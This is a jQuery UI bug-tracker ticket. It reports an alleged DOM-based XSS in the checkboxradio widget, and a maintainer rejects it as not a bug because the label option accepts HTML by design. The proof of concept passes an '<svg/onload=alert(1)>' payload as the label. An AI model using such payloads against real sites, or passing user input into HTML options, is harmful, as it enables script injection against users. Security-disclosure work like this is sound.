Search and Top Navigation
#15200 closed bug (notabug)
Opened June 06, 2017 01:16PM UTC
Closed June 06, 2017 01:26PM UTC
Last modified June 06, 2017 01:49PM UTC
Checkboxradio widget, label attribute DOM based XSS
| Reported by: | psych0tr1a | Owned by: | |
|---|---|---|---|
| Priority: | minor | Milestone: | none |
| Component: | ui.checkbxoradio | Version: | 1.12.1 |
| Keywords: | Cc: | ||
| Blocked by: | Blocking: |
Description
Proof of concept:
<link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/smoothness/jquery-ui.css">
<script src="//code.jquery.com/jquery-1.12.4.js"></script>
<script src="//code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
<fieldset>
<legend>Select a Location: </legend>
<label for="radio-1">New York</label>
<input type="radio" name="radio-1" id="radio-1">
<label for="radio-2">Paris</label>
<input type="radio" name="radio-1" id="radio-2">
<label for="radio-3">London</label>
<input type="radio" name="radio-1" id="radio-3">
</fieldset>
<script>
$( "input[type='radio']" ).checkboxradio({
label: "<svg/onload=alert(1)>"
});
</script>
Attachments (0)
Change History (4)
Changed June 06, 2017 01:26PM UTC by comment:1
| resolution: | → notabug |
|---|---|
| status: | new → closed |
Changed June 06, 2017 01:29PM UTC by comment:2
Sorry but you are absolutely wrong. Functionality means that there will be inserted text ane html, if the developers will use this functionality and there will be a user input then this is XSS.
Example of similar bug http://www.cvedetails.com/cve/CVE-2010-5312/
Changed June 06, 2017 01:32PM UTC by comment:3
another fixed bug
https://domstorm.skepticfx.com/modules?id=5739c438c9e0250300990935
Changed June 06, 2017 01:49PM UTC by comment:4
Those are both text options, this is an HTML option.
That's not XSS. That's you explicitly inserting a script.